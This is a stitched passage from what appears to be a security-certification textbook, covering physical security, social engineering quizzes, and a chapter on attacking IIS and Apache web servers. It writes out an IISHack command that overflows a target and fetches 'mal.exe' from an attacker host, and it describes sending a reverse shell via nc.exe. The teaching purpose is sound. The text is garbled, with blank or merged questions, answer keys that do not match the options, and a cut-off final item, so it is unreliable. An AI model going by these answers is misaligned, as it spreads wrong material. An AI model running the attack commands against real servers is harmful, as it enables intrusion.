buildings to prevent vehicles from driving through exterior walls and doors.
Lights
Closed circuit
TV (CCTV)
DESCRIPTION
PC and laptop
controls
Protection of PCs and laptops from theft; port controls to prevent use of serial
and parallel interfaces; power-on password protection; laptop tethers to fixed
objects.
Locks
Locks are a simple and effective deterrent to intruders. Locks vary in construction and application, as
summarized in the following descriptions:
Warded locks. The common padlock that is opened with a key; subject to lock picking
Tumbler locks. More secure locks that use pin tumblers, lever tumblers, or wafer tumblers
Combination locks. Locks with dials or a series of wheels that require the correct combination of
numbers to open; subject to shoulder surfing observation from other individuals
Device locks/cable locks. Locks that are used to secure equipment; these types of locks
include:
o
There are a number of methods of addressing the problem of data remanence. These methods
include:
Clearing. Overwriting the magnetic medium a number of times; usually done when the media
remain in the original environment
These methods are important because the normal erasure of data performed through the operating
system does not delete the data but only modifies the File Allocation Table and changes the first
character of the file.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
2.
3.
Dumpster diving and shoulder surfing are examples of which subtype of social engineering
attack?
a. Important user posing
b. In person
c. Masquerading
d. Technical support
4.
Pop-up windows, spam email, email attachments, and fake websites are examples of
which category of social engineering?
a. Human-based (person-to-person)
b. Computer-based
c. Social-based
d. Judgment-based
5.
A social engineering attack where the attacker convinces an unsuspecting individual that
he or she is authorized by a third party in a position of authority to receive sensitive
information from the individual falls under what category of social engineering?
a. Human-based (person-to-person)
b. Computer-based
c. Technical-based
d. Judgment-based
6.
Which one of the following is not a characteristic that motivates individuals to become
victims of social engineering attacks?
a. Inclination to respond to people in authority
b. Desire to return a favor
c. Fear of missing a deadline
Which one of the following best demonstrates the degree of threat posed by social
engineering?
a. Because social engineering does not bypass technical protection mechanisms, it is
not a very great threat.
b. Social engineering allows an attacker to bypass the best technical protection
mechanisms and acquire critical data from unsuspecting human sources.
c. Social engineering allows an attacker to bypass the best technical protection
mechanisms, but is not effective in acquiring critical data from unsuspecting human
sources.
d. Social engineering does not allow an attacker to bypass the best technical
protection mechanisms and acquire critical data from electronic devices.
8.
Which one of the following is not a step in conducting a reverse social engineering attack?
a. Making it difficult for the target victim to contact the attacker.
b. Sabotaging the targets equipment.
c. Ensuring the target is aware that the attacker is a person of authority with the skills
needed to repair the equipment (advertising).
d. In providing assistance in solving a problem, the attacker gains the trust of the
target and obtains access or sensitive information.
9.
In what type of attack does the attacker send a fraudulent email message which states
that the email is from a bank, requests the bank account ID and password, and provides a
link to a web server that generates a window that looks like the banks website?
a. Smurf
b. Phreaking
c. Phishing
d. Webing
10. Which mechanism is used to maintain the state of a website, provide a means of running
attack code to present a false Web page, and acquire sensitive information?
a. Page views
b. Obfuscation
c. Hidden tabs
d. Hidden frames
11. A hacker implementing a phishing attack sometimes obscures a fake website in order to
avoid being traced through the registration records of the domain. This technique is known
as which of the following acts?
a. URL misdirection
b. URL obfuscation
c. URL virtualization
d. URL linking
12. Which one of the following methods is not commonly used to obscure a URL?
a. Representing characters in the URL in hexadecimal format
b. Expressing the domain name as dotted decimal IP address in different formats,
such as hexadecimal, octal, or double word (dword)
c. Adding irrelevant text after http:// and before the @ symbol
d. Incrementing memory buffers through software modifications
13. Linking different parts of an image without having to partition the image into separate
subimages is called:
a. Image mapping
b. Image transference
c. Image translation
d. Image division
14. The technique of linking to different parts of an image without having to partition the image
into separate subimages is used by phishing attackers to accomplish which one of the
following?
a. To terminate a phishing attack
b. To redirect a phishing victim to a fraudulent, imitation website
c. To steer a phishing victim away from a fraudulent, imitation website
d. Is not used in any type of phishing attack
15. Dumpster diving, stealing a persons mail, and stealing a persons wallet or purse are used
for which of the following attacks?
a. Dictionary
b. Phishing
c. Identity theft
d. Back door
16. Social engineering primarily involves which one of the following?
a. Focus on technical components
b. Personnel-related interactions
c. Encryption
d. Business continuity
17. Which one of the following is not a measure to defend against social engineering attacks?
a. Employee awareness training
b. Information and document classification
c. Policies and procedures
d. Providing passwords by telephone
18. Document controls, help desk practices, hiring and termination procedures, access
controls, and password assignments are areas that should be addressed by which one of
the following items to defend against social engineering?
a. Policies and procedures
b. Document classification
c. Physical security
d. Certification
19. Newsletters, understanding information classification procedures, understanding how to
protect sensitive information, and recognizing which data have to be protected are
components of which social engineering defense?
a. Policies and procedures
b. Employee awareness training
c. Physical security
d. Certification
20. Which of the following is the most important criterion for classifying information?
a. Useful life
b. Personal association
c. Value
d. Age
21. Which one of the following actions is not a reason to classify information?
a. Satisfy external queries
b. Meet regulatory requirements
c. Support confidentiality and availability
d. Identify protection mechanisms for information
22. What information classification level states, the unauthorized disclosure of this information
could cause serious damage to the countrys national security?
a. Confidential
b. Sensitive But Unclassified
c. Top Secret
d. Secret
23. Which one of the following is not a physical security practice that is effective against social
engineering?
a. Leaving sensitive documents unlabeled
b. Securing sensitive documents in locked cabinets
c. Encrypting hard drives
d. Shredding discarded paper documents
24. Which one of the following is not a typical threat to physical security?
a. Natural events such as thunderstorms, hurricanes, tidal waves, snow storms,
earthquakes, and tornadoes
b. Attacks against encryption
c. Military action, strikes, sabotage, theft, and vandalism
d. Emergencies such as release of toxic gases, fires, loss of heat, loss of electrical
power, loss of air conditioning, equipment failure, and water damage
25. What are the two metrics that are useful in evaluating failure of various types of
equipment?
a. Mean Time Between Failure (MTBF) and Mean Time to Test (MTTT)
b. Mean Time From Initiation (MTFI) and Mean Time to Repair (MTTR)
c. Mean Time Between Failure (MTBF) and Mean Time to Repair (MTTR)
d. Mean Time To Repair (MTTR) and Mean Time to Test (MTTT)
26. In selecting a new site for a data facility, which one of the following is not an area that has
to be considered?
a. Joint tenancy
b. Visibility
c. Transportation
d. Logical access controls
27. What aspect of facility control generates information such as time and date of attempts to
access, modification of access privileges, and security violations?
a. Man-trap
b. Closed circuit TV
c. Access log of events
d. Media controls
28. Employment background checks, non-disclosure agreements, exit interviews, and
changes of passwords are elements of which type of controls?
a. Logical
b. Personnel
c. Encryption
d. Access
29. In electrical systems, which one of the following defines a prolonged low voltage?
a. Blackout
b. Sag
c. Brownout
d. Fault
30. In electrical systems, a surge is:
a. Prolonged high voltage
b. Momentary high voltage
c. Momentary noise
d. Spike
31. In fire safety, the primary concern is which one of the following?
a. Loss of critical documents
b. Personnel safety
c. Economic impact
d. Equipment loss
32. Which one of the following extinguishing agents is used on a fire with Class A
combustibles?
a. Water or soda acid
b. CO2
c. Halon
d. All of the above
33. Which one of the following extinguishing agents is banned by the Montreal Protocol of
1987 because it decomposes into toxic chemicals at high temperatures?
a. CO2
b. CO
c. Halon
d. Soda acid
34. Which one of the following describes the combustible materials in a Class C fire?
a. Wood, cloth, paper, rubber, ordinary combustibles
b. Flammable liquids, gases, oils, and paints
c. Energized electrical equipment
d. Flammable chemicals such as magnesium and sodium
35. Which type of sprinkler system uses a fusible link in the water outlet nozzle?
a. Wet pipe
b. Dry pipe
c. Deluge
d. Hybrid
36. Which type of access card responds to the magnetic field of the reader?
a. Passive electronic
b. Photo ID
c. Active electronic
d. Magnetic stripe
37. In biometrics, a Type 1 authentication mechanism is which one of the following?
a. Something you have
b. Something you know
c. Something you are
d. Something you do
38. In biometrics, the Crossover Error Rate (CER) is defined as:
a. The percentage of invalid subjects that are falsely accepted
b. The percentage of invalid subjects that are falsely rejected
c. The percent in which the False Rejection Rate (FRR) is greater than the False
Acceptance Rate (FAR)
d. The percent in which the False Rejection Rate (FRR) equals in the False
Acceptance Rate (FAR)
39. Which one of the following describes additional biometric performance characteristics?
a. Enrollment time
b. Throughput rate
c. Acceptability
d. All of the above
40. Which type of fence deters most intruders?
a. 8 feet high with strands of barbed wire
b. 3 to 4 feet high with strands of barbed wire
c. 6 to 7 feet high
d. 5 to 6 feet high
41. When using illumination for physical security, what type of illumination should be used to
cover sensitive areas?
a.
b.
c.
d.
42. What term refers to data that reside on magnetic media following erasure?
a. Clearing
b. Object reuse
c. Data remanence
d. Purging
Answers
1.
Answer: a
2.
Answer: b
3.
Answer: b
The correct answer is b, an in-person attack where a hacker conducts his or her information
gathering in person on the premises of an organization. Answer a, important user posing, occurs
when an attacker pretends to be an individual in a position of authority and uses that pretense to
intimidate people into providing information for fear of offending the important person. Answer c,
masquerading or impersonation, involves an attacker pretending to be someone else: for example,
an outside contractor, a repairman, or a delivery person. Answer d, technical support, refers to an
attacker posing as a technical support person for an organization and requesting passwords and
other sensitive information from a trusting employee by telephone or in person.
4.
Answer: b
5.
Answer: a
6.
Answer: d
People are trusting, in general, and this characteristic is taken advantage of by social engineering
attackers.
7.
Answer: b
8.
Answer: a
In fact, a good reverse social engineering implementation will result in the target calling the
attacker and requesting help. The attacker will not have to contact the target, but merely waits for
the targets call.
9.
Answer: c
10. Answer: d
11. Answer: b
12. Answer: d
13. Answer: a
14. Answer: b
15. Answer: c
16. Answer: b
17. Answer: d
18. Answer: a
19. Answer: b
20. Answer: c
21. Answer: a
22. Answer: d
23. Answer: a
24. Answer: b
25. Answer: c
26. Answer: d
27. Answer: c
28. Answer: b
29. Answer: c
30. Answer: a
31. Answer: b
32. Answer: a
33. Answer: c
34. Answer: c
35. Answer: a
36. Answer: a
37. Answer: b
38. Answer: d
39. Answer: d
40. Answer: a
41. Answer: b
42. Answer: c
Chapter List
Chapter 13: Web Server Hacking and Web Application Vulnerabilities
Chapter 14: SQL Injection Vulnerabilities
Chapter 15: Cryptography
Chapter 16: Cracking Web Passwords
Web Servers
The most widely used web servers are Microsoft IIS, Apache, and Sun Java System Application
Server. The most recent versions of IIS are version 5.1 for Windows XP Professional, IIS 6.0 for
Windows Server 2003 and Windows XP Professional x64 Edition, and IIS 7.0 for Windows Longhorn
Server and Windows Vista.
The Apache HTTP Server is the most popular Web server in use today. It is open-source, free
software developed by the Apache Software Foundation for Windows, Unix, Novel Netware, and a
number of other operating systems. Version 2.2.4 of Apache HTTP server has recently been released.
The Sun Java System Application Server is also available at no cost in three editions from Sun
Microsystems. This software provides a Java 2 platform for developing and delivering Java Web
applications and services.
IIS Attacks
Three basic types of attacks have been used against IIS. These attacks are buffer overflow, file
system traversal, and source disclosure.
Buffer Overflow
Four examples of buffer overflow attacks against IIS are the IPP Printer Overflow attack, the ISAPI
DLL Buffer Overflow attack, the WebDAV/ntdll.dll exploit, and the attack using IISHack.exe.
The Printer Overflow exploits the mws3ptr.dll, which is the ISAPI filter that interacts with printer
files and processes user requests. Sending an HTTP printer request with 420 bytes in the Host field to
the server will cause the server to overflow and return a command prompt to the sender, who can use
hacking tools such as IIs5hack to initiate an exploit.
The ISAPI DLL Buffer Overflow attack exploits Microsofts IIS Indexing Service DLL (ida.dll) and
Microsoft Data Query file (idg.dll). Associated buffer overflow attacks result in the execution of
malicious code due to a lack of input buffer parameter checking in the code used to process input
URLs for the .idq or .ida application mapping.
Installed versions of IIS include World Wide Web Distributed Authoring and Versioning (WebDAV)
capability as specified in RFC 2518. This capability implements a standard for file management and
editing on the Web. When a lot of data are sent to WebDAV, the data are sent to their ntdll.dll
components, which do not conduct sufficient bounds checking, causing a buffer overflow. This
condition can result in the execution of malicious code in the IIS environment.
In the IISHack.exe attack, the IIS http daemon buffer is made to overflow, and malicious code can
then be executed. An attack against WebserverA that is listening to port 80 is summarized in the
following commands. The malicious script is resident on hackserver, and mal.exe is the link to the
malicious script.
c:\ iishack www.WebserverA.com 80
www.hackserver.com/mal.exe
Source Disclosure
In the source disclosure attack, IIS is manipulated to reveal the source code of a server side
application. This attack can be conducted, for example, against the Microsoft Windows NT File
System (NTFS). One of the data streams in NTFS that contains the main elements of the file has an
attribute called $DATA. The IIS server is vulnerable to file-related requests involving the $DATA
attribute, resulting in the revelation of the contents of the file. Another attack is implemented
submitting a file request that appends +htr to the global.asa file. HTR is a first-generation
HTML-like advanced scripting technology that was never widely adopted. Active Server Pages (ASP)
was introduced in IIS 4.0 and displaced HTR.
Source code disclosure exploits can provide the following information to the attacker:
Credentials from the Web.config file
Database organization
Source code vulnerabilities
Knowledge of the application
Application parameters
Vulnerabilities in source code comments
Escalation of privileges
Purchasing data
Credit card numbers
An additional source disclosure involves the showcode.asp example files. IIS 4.0 includes these
sample files to provide information about ASP to Web developers. Showcode.asp provides the ability
to view the source code of applications on the server, both within and without the document root
directory, through a browser.
Apache Attacks
The Apache server has a high degree of reliability, but also has vulnerabilities. Some of the attacks
that exploit Apache vulnerabilities include:
Apache chunked encoding vulnerability. The HTTP protocol provides for communication
between the Web server and a browser to negotiate the size of chunks of data to be sent to the
server when the amount of data being transmitted to the server is not known in advance. A flaw in
the Apache software misreads the size of the chunks to be received, resulting in a stack overflow
and the possibility of executing malicious code.
Mod_proxy buffer overflow. Apache uses the mod_proxy module to set up a proxy server for
HTTP and FTP protocols. A vulnerability in the module file proxy_util.c can lead to a buffer
overflow in the web server, enabling the execution of malicious code that can cause a denial of
service in the server.
Long URLs. Lengthy URLs processed by the mode_autoindex, mod_negative, and mod_dir
modules can result in the server showing directory contents.
PHP scripting. PHP is a general-purpose scripting language that is commonly used with Apache
Web servers. PHP can be used with HTML for Web development but contains vulnerabilities that
would allow a hacker to run malicious code on the web server host.
URL trailing slashes. Many trailing slashes in a URL can expose a listing of the original
directory.
Hacking Tools
A variety of tools have been developed to probe, disassemble, and gain access to code on Web
servers. Not surprising, these tools are also used for hacking. A summary of some of these tools is
listed as follows:
CleanIISLog. This provides a means for an attacker to cover tracks by clearing entries of his or
her IP address in IIS log files.
RPC DCOM. Remote Procedure Call Distributed Component Object Model creates a stackbased buffer overflow attack because of improper handling of TCP/IP messages by Microsoft
RPC software. Overflow manifests in RPC DCOM interface at ports 135 or 139. An attacker can
exploit this vulnerability to gain system privileges and create new accounts, install malicious
code, or remove or modify files.
cmdasp.asp. ASP runs on a web server and is used to produce interactive, dynamic Web pages.
ASP Web pages can be identified by the extension .asp rather than .htm. CmdAsp.asp is an
interactive command prompt to an ASP Web page on IIS servers. The USR_COMPUTER and
IWAM_COMPUTER user accounts represent a vulnerability in that they will execute scripts such
as ASP or Perl and provide a back door to the IIS server. Cmdasp.asp can also send a shell
back to the hackers PC by uploading nc.exe to the IIS web server.
iiscrack.dll. This is similar to cmd.asp and provides a path for a hacker to send commands that
run on the web server with System privileges.
ispc.exe. This is a client that copies the Trojan ISAPI DLL to a web server and sets up a remote
shell with System privileges.
WebInspect. This web server application vulnerability scanner that categorizes over 1,500 Web
pages, can perform over 30,000 security checks, and provide remediation recommendations.
ASN. The Microsoft Abstract Syntax Notation 1 (ASN.1) Library does not check buffer parameters
and can suffer a buffer overflow. An attack based on this vulnerability can give the hacker system
privileges.
Microsoft Windows NT 4.0 / 2000 Unspecified Executable Path Vulnerability. This enables
automatic execution of Trojans when DLL files and executables are not preceded by a registry
path. In this situation, the operating system will try to find the file in a sequence of directories in a
specific order. This behavior can facilitate the automatic execution of Trojans if they are renamed
as executables that do not have a specified path.
execiis-win32.exe. This is a directory traversal attack that uses cmd to execute commands on an
IIS web server.
Patch Management
Patch management is necessary to protect an organization from attacks and maintain the continuity
and reliability of operations and production systems. Patch management is the process of organizing
and directing the distribution and installation of provisional software revisions to resources on the
network. This additional software is referred to as a patch. A similar term is a hotfix, which refers to
adding a patch during normal operation of the computer system.
In organizations with large numbers of distributed resources, tracking and installing patches can be
expensive, time consuming, and people intensive. Automated patching systems greatly reduce the
time and expense of patching.
The motivations for installing patches in a timely manner include the costs associated with the
unavailability of computing resources, the costs to return a victimized computer to operating condition,
impact on an organizations reputation, possible compromise of data, and potential legal liability.
Problems can also result from defective patches that do not address the identified issues or that
create additional vulnerabilities, particularly in automated patching systems. Another concern is that a
typical organization might have different versions of operating systems and applications running on a
variety of platforms, so a common patch deployment might not be practical and effective. This
UpdateExpert. This is a security management utility for Windows 2000/NT systems and Terminal
Server computers that supports identifying, downloading, and installing the required hotfixes and
service packs.
Qfecheck. This is a Microsoft command-line tool that allows network administrators to track and
verify installed Windows 2000 and Windows XP hotfixes.
HFNetChk. This is a Microsoft software engine available through the command-line interface of
the Microsoft Baseline Security Analyzer (MBSA) Version 1.1.1. HFNetChk provides the system
administrator with the ability to check the patch status of all the machines in a network from a
central location by accessing an XML database that is kept current by Microsoft. It is applicable to
a variety of Microsoft products, including Windows XP, Windows 200, Windows Server 2003, SQL
Server 7.0, and Internet Explorer 5.01, and later.
Cacls.exe. This is an interactive, command-line utility for Windows NT/2000/XP used for
managing and storing access control lists (ACLs). It also supports other administrative functions
in enterprise environments. Cacls.exe works under the NTFS file system and is stored by
default in the %SystemRoot%\System32 folder for all installations of Windows NT, 2000, and
XP.
Cross-Site Scripting (XSS). In XSS, an attacker sends a specific request to a website that
causes the website to send malicious Web or email code to another user. By exploiting
vulnerabilities in the web server, an attacker uses the website as an intermediary for transferring
malicious code to another victim. In this attack, the victim is usually not aware of being exploited
because he or she assumes the data received are from a valid Web server. One example of
malicious action is for the attack code to copy cookies from the victims computer and relay them
to the attacker.
Remote code execution. This attack provides the means for a hacker to execute his or her
system level code on a target web server. With this capability, an attacker can compromise the
web server and access files with the same rights as the server system software. For example, a
number of XML-RPC PHP programs contain a vulnerability that could enable the transfer of
unchecked user commands to the eval( ) function in the XML-RPC server.
Username enumeration. This attack manipulates the backend authentication script to inform an
attacker whether a submitted user name is valid. Iterations exploiting this vulnerability can aid the
attacker in determining the correct user name through interpretation of error messages. Initial
guesses at usernames might include typical default settings such as guest and admin.
SQL injection. This attack focuses on the database application of a web server and enables a
hacker to acquire sensitive information stored in the database or to execute remote code. The
name refers to Microsofts SQL database, but it is also applicable to other databases such as
Oracle Net Listener and MySQL. One version of the attack occurs when the user input stream
contains a string literal escape characters and these characters are not properly screened. For
example, the attacker might place the ' character in the username field. This input can modify
the results of SQL statements conducted on the database and result in manipulation of the
database contents and, possibly, the Web server. One reason for this is that error messages
displayed by the SQL server from incorrect inputs such as the ' character in the username can
provide valuable information, such as password hashes, usernames, and the database name, to
an attacker.
Command injection. This attack injects system commands into computer program variables
such that they are executed on the web server.
Attack obfuscation. This is the practice of obscuring or making something difficult to analyze or
understand. Code, particularly Java, C++, and Perl code, can be obfuscated in order to prevent
reverse engineering of programs. Attackers use URL obfuscation to avoid the possibility of the
source of an attack being traced to them.
DMZ protocol. A Demilitarized Zone (DMZ) is a neutral, intermediate zone, between an external
network and a secure, internal network. A DMZ normally incorporates a firewall, which a hacker
will attempt to bypass using IP, TCP, and HTTP protocol attacks.
Zero-day attack. This attack exploits a vulnerability before it is generally known to the public
and, usually, before patches for the vulnerability have been announced and distributed.
Buffer overflow. This is an input validation attack that is usually the result of weak or nonexistent parameter checking in the processing software. The attack sends data that exceed a
buffer capacity, causing an overflow of data. These data can be interpreted as executable code
and, when run, can give the attacker system level privileges on the web server.
Form/Hidden field manipulation. This is altering the data in a hidden field in order for an
application to use attack-related data.
Netcat
In addition to scanning, the hacker can use Netcat to categorize the web server (banner grabbing)
and proceed with an attack to escalate privileges and provide access to files in all portions of the web
server. Netcat is a tool that can be used to read and write information on TCP and UDP networks. The
Gnu Netcat site (http://netcat.sourceforge.net) describes Netcat as a featured networking utility which
reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a
reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the
same time, it is a feature-rich network debugging and exploration tool, since it can create almost any
kind of connection you would need and has several interesting built-in capabilities.
The original version of Netcat was developed in 1995 by Avian Research. A newer version, developed
under the GNU Netcat project, was composed by Giovanni Giacobbi. Both versions can be run with
the nc command.
The Netcat syntax is shown in the Netcat help screen in Figure 13-2.
Black Widow
Black Widow is a product of SoftByte Labs that performs website scans and website ripping. Website
ripping is the ability to copy the structure of a Web site to a local disk and obtain a complete profile of
the site and all its files and links.
Instant Source
Another tool that provides for examination of the source code of a Web page is Instant Source from
www.blazingtool.com. Instant source works with Internet Explorer and will display source code for
selected portions of a Web page. The tool will also display images, Flash movies, and scripts files on
a Web page.
Wget
A useful site ripping free tool that can obtain Web files using FTP and HTTP is GNU Wget
(www.gnu.org/software/wget/wget.html). Wget works with Windows and Unix and can acquire HTML
pages and data from FTP sites while working in background mode. This tool can time stamp acquired
files and note if changes have occurred over time.
Websleuth
Websleuth is an open-source manual exploration tool that comprises a variety of Visual BASIC
applications for analyzing the security posture and functionality of Web applications. It is used by
auditors who wish to probe and evaluate the basic components of Web applications and possible
vulnerabilities, including parameter manipulation and cross-site scripting. It also provides for adding
code plug-ins to address specific concerns. A Websleuth screenshot is shown in Figure 13-3.
Nikto
Nikto is an open-source web server scanner that scans for malicious files and CGIs on a variety of
servers. It is a Perl-based vulnerability tool that scans rapidly and is detectable when it operates.
Wikto
Wikto is a Web-scanning tool similar to Nikto but with added features. Wikto does not scan Web
applications or search for open ports, but probes for web server vulnerabilities such as vulnerable
scripts and directories that might be subject to compromise. Wikto comprises the following three main
elements:
Back End Miner. This searches recursively through directories and applies fuzzy logic to
ascertain if a file/directory exists.
Googler. This searches for directories on the website by looking for Google key words, extracting
directory names from URLs retrieved, and searching for interesting files on the website. To
make use of this feature, a Google key is required.
Nikto-like functionality. This performs Nikto-type scans but uses different mechanisms.
Figure 13-4: Wikto Googler screen (Taken from Sensepost Web site)
Nessus
Nessus is a freely available, rule-based remote vulnerability scanner that uses script-based plug-ins.
The source code of Nessus is proprietary to Tenable Network Security.
Network Utilities
Network utility programs perform functions useful to network engineers and security engineers. These
functions might be security related, such as supporting penetration testing or identifying security flaws.
Other tasks might include checking for unidentified items that have appeared in log files. A number of
the popular utilities and related tools are reviewed in the following list:
Whisker/libwhisker. These are a Perl-based library and a CGI vulnerability scanner module,
respectively; however, the whisker scanner has been supplanted by the Nikto tool. Both Whisker
and Nikto use libwhisker, which is an effective HTTP server security scanner. Libwhisker is a Perl
library module and is not a direct application. Using the Perl library, custom HTTP packets can be
developed using the whisker anonymous hash data structure, which is similar to an associated
array. This hash function can be used to generate HTTP requests and acquire HTTP responses
from websites.
Shadow Security scanner. This conducts vulnerability scans on the Internet, extranets, and
intranets and offers remediation strategies. It comprises a variety of system-specific vulnerability
modules, including those for CGI, NetBIOS, HTTP, FTP, UDP, MySQL, and others.
Countermeasures
Up to this point in this chapter, the focus has been primarily on identifying web server vulnerabilities,
security flaws, attack scenarios, and software supporting these activities. This section presents an
overview of effective counter-measures and security approaches for the most common attacks:
IIS buffer overflow. Buffer overflows can be mitigated by conducting frequent scans for server
vulnerabilities, promptly acquiring and installing Microsoft service packs, implementing
effective firewalls, applying URLScan and IISLockdown utilities, and removing IPP printing
capability.
Secure IIS. A number of modifications were made to IIS 6.0 to enhance security. These
changes include:
Not installing a number of services and features by default
Improved authentication and access control
Modifications of Active Server Pages (ASP) components
Installation in locked-down mode
Limitations on Multipurpose Internet Mail Extensions (MIME) types
Default rendering of ASP.NET and ASP inoperative
Default inactivation of anonymous password synchronization
Limitation of access by executables
File system traversal. File system traversal effectiveness can be reduced by promptly
applying appropriate Microsoft hotfixes and patches, restricting privileges to executables such
as cmd.exe, and locating the system software on a different disk drive from the Web site
software and content directory. Another effective measure is to install the IISLockdown tool
from Microsoft. This tool includes URSS-can software that screens web server requests and
inhibits requests containing attack-type characters.
Remote code execution. Execution of remote code can be reduced or eliminated by not using
shell commands, if possible. Another useful measure would be to restrict processing of user
input data that has not been sanitized beforehand.
SQL injection. A counter against SQL injection is to provide customized database server error
messages that do not provide the attacker with useful data. Apply the principle of least
privilege to a user by not connecting the user to the database with the privileges of an owner of
the database or of a superuser.
Cross Site Scripting (XSS). One countermeasure against this type of attack is to constrain
and sanitize the input data stream. Input originating from server controls should be subject to
ASP.NET validator controls such as RangeValidator. All input data should be checked for data
type, format, range, and irregular expressions. The second principal control against XSS is to
encode output that contains user input data or data from databases. HtmlEncode can be
applied to encode characters with special designations in HTML, thus obscuring executable
code that would otherwise be run.
Username enumeration. Compose and return consistent error messages of the type that do
not provide keys to valid usernames. Also, survey to ensure that maintenance, testing, and
other general accounts with predictable passwords are not active when a web application is
enabled.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
2.
Which one of the following steps is not a part of a client to web server interchange?
a. A TCP connection is established between the client browser and port 80 on a
remote host server through a Uniform Resource Locator (URL).
b. The web server browser processes the HTML tags and presents the Web page on
the client screen.
c. The HTTP web server waits for a GET request message from the client browser on
port 80 for a file on the Web page according to the HTTP protocol.
d. When the server receives the request message, it responds with a status message
(HTTP/1.1 200 OK) and a message containing additional information such as the
HTML text for the requested Web page.
3.
The common gateway interface (CGI) and Active Server Page (ASP) dynamic scripting
environment are examples of which one of the following elements?
a. Web applications running on a web server
b. Client-side applications running on a browser
c. Web browser protocols
d. Browser-server interchange protocols
4.
Tools such as Nmap, Superscan, and Amap are used primarily for which one of the
following Web attack steps?
a. Banner grabbing
b. Defeating authentication
c. Scanning
d. Attacking the database
5.
6.
Apache, Microsoft IIS, and Sun Java System Application refer to which one of the following
entities?
a. Client applications
b. Web server applications
c. HTTP Servers
d. Vulnerability scanners
7.
Which one of the following is not one of the three typical attacks used against Microsoft
IIS?
a. Source divergence
b. File system traversal
c. Source disclosure
d. Buffer overflow
8.
Which are the two types of Internet Server Application Programming Interface (ISAPI)
programs?
a. ISAPI filters and ISAPI traversals
b. ISAPI traversals and ISAPI extensions
c. ISAPI filters and ISAPI flow matrices
d. ISAPI filters and ISAPI extensions
9.
A set of programs called to perform specific functions such as printing is known as which
one of the following?
a. Dynamic loading library (DLL)
b. Function support (FS)
c. Dynamic link library (DLL)
d. Software links (SL)
10. Which one of the following is not an example of a buffer overflow attack against IIS?
a. $DATA attribute
b. IPP Printer Overflow
c. WebDav/nt.dll.dll
d. IISHack.exe
11. Which of the following is useful in banner grabbing?
a. Web cracker
b. Superscan and Nmap
c. Telnet and Netcat
d. SQLbf
12. Which of the following items is a popular web server?
a. Apache
b. Microsoft IIS
c. Sun Java System
d. All of the above
13. The IIS Printer Overflow exploits which one of the following filters?
a. +htr
b. SQL.exe
c. mws3ptr.dll
d. ntdll.dll
14. Which one of the following is not a component involved in an IIS buffer overflow attack?
a. World Wide Web Distributed Authoring and Versioning (WebDAV)
b. IISHack.exe
c. URL encoding
d. Microsoft Data Query file (idg.dll)
15. For security purposes, clients are normally restricted to a partition of the Web server file
system that comprises application software. This area is called:
a. Web document root directory
b. Web cache
c. Client root directory
d. Back door
16. A web server attack that involves a hacker gaining access to restricted areas and files on a
web server is known as which type of attack?
a. Buffer boundary
b. File system traversal
c. Encryption
d. File overflow
17. By inserting special characters in URLs, such as the character sequence ../, an attacker
can initiate which type of attack on a web server?
a. Source disclosure
b. Buffer overflow
c. File system traversal
d. Flood
18. An industry standard that is used to encode characters and that can be used in developing
an attack that exposes files on areas of a web server is called?
a. Hamming code
b. Unicode
c. ASCII
d. Dualcode
19. The encoded strings %c1%1c and %c0%af used in a file system traversal attack represent
which characters that can be used in the attack?
a. %@% or %$%
b. $D$ or %D%
c. \ or /
d. #+# or $+$
20. Which of the following is not a means of protecting against a file system traversal arrack?
a. System software located on the same drive as website software and content
directory
b. System software located on a separate drive from website software and content
directory
c. Installing Microsoft IIS Lockdown tool
d. Applying URSScan software
21. A source disclosure attack against the Microsoft Windows NTFS file system exploits a
vulnerability against which one of the following file attributes?
a. $NTFS
b. @ATTR
c. $DATA
d. $CONFIG
22. What type of attack is implemented by submitting a file request that appends +htr to the
global.asa file?
a. Encryption
a. ispc.exe
b. execiis-win32.exe
c. ASN
d. RPC DCOM
31. Which one of the following is a directory traversal attack that uses cmd to execute
commands on an IIS web server?
a. ispc.exe
b. RPC DCOM
c. execiis-win32.exe
d. ASN
32. What is defined as the process of organizing and directing the distribution and installation
of provisional software revisions into production settings?
a. Patch management
b. Data remanence
c. Object reuse
d. Patch verification
33. Which of the following is a justification for installing hot fixes or patches in a timely
manner?
a. The costs associated with the unavailability of computing resources
b. The costs to return a victimized computer to operating condition
c. Potential legal liability
d. All of the above
34. Which one of the following is not a patch support software tool?
a. Qfecheck
b. HFNetChk
c. UpdateExpert
d. Patcheck-I
35. In which Web application attack does an attacker send a specific request to a Web site
that results in the website sending malicious Web or email code to another user?
a. Cross-Site Scripting (XSS)
b. Remote code execution
c. Username enumeration
d. SQL injection
36. In which type of Web application attack is a vulnerability exploited before it is generally
known to the public and, usually, before patches for the vulnerability have been announced
and distributed?
a. Zero-day attack
b. Genesis attack
c. Early attack
d. Initial attack
37. An attack that exploits a vulnerability in XML-RPC PHP programs that could enable the
transfer of unchecked user commands to the eval( ) function in the XML-RPC server is
which one of the following?
a. Remote code execution
b. Username enumeration
c. Cookie/Session poisoning
d. Attack obfuscation
38. An attack that focuses on the database application of a web server and enables a hacker
to acquire sensitive information stored in the database or execute remote code is called
which one of the following?
a. Username enumeration
b. SQL injection
c. DMZ protocol
d. Hidden field
39. The syntax nc -l -p port [-options] [hostname] [port] in which an attack
computer is listening for inbound information is used by what hacking tool that is used for
scanning and banner grabbing?
a. Black Widow
b. Wget
c. Netcat
d. Nikto
40. The ability to copy the structure of a website to a local disk and obtain a complete profile of
the site and all its files and links is best known by which one of the following terms?
a. Website identification
b. Website reviewing
c. Website imaging
d. Website ripping
41. Which Web assessment software is an open source manual exploration tool that
comprises a variety of Visual BASIC applications for analyzing the security posture and
functionality of Web applications?
a. Wget
b. Wikto
c. Websleuth
d. Googler
42. What tool probes for web server vulnerabilities such as vulnerable scripts and directories
and comprises elements that include Back End Miner and Googler?
a. Wikto
b. Nikto
c. Nessus
d. Wget
43. What term describes a primarily Perl-based, open-source program that supports
penetration testing of a variety of operating systems as well as exploit generation and
vulnerability experimentation?
a. cacls.exe
b. Objecteval
c. Metasploit
d. OSploit
44. Which one of the following modifications was not made to IIS 6.0 to enhance security?
a. Installation in locked-down mode
b. Installing a number of services and features by default
c. Default rendering of ASP.NET and ASP inoperative
d. Modifications of Active Server Pages (ASP) components
45. A suspicious hexadecimal entry in an audit file is found to represent the IP address of a
potential hacker. The hexadecimal value is 0xa1.0xb6.0xcd.0x1c. What IP address
does this hex number represent?
a. 201.182.202.27
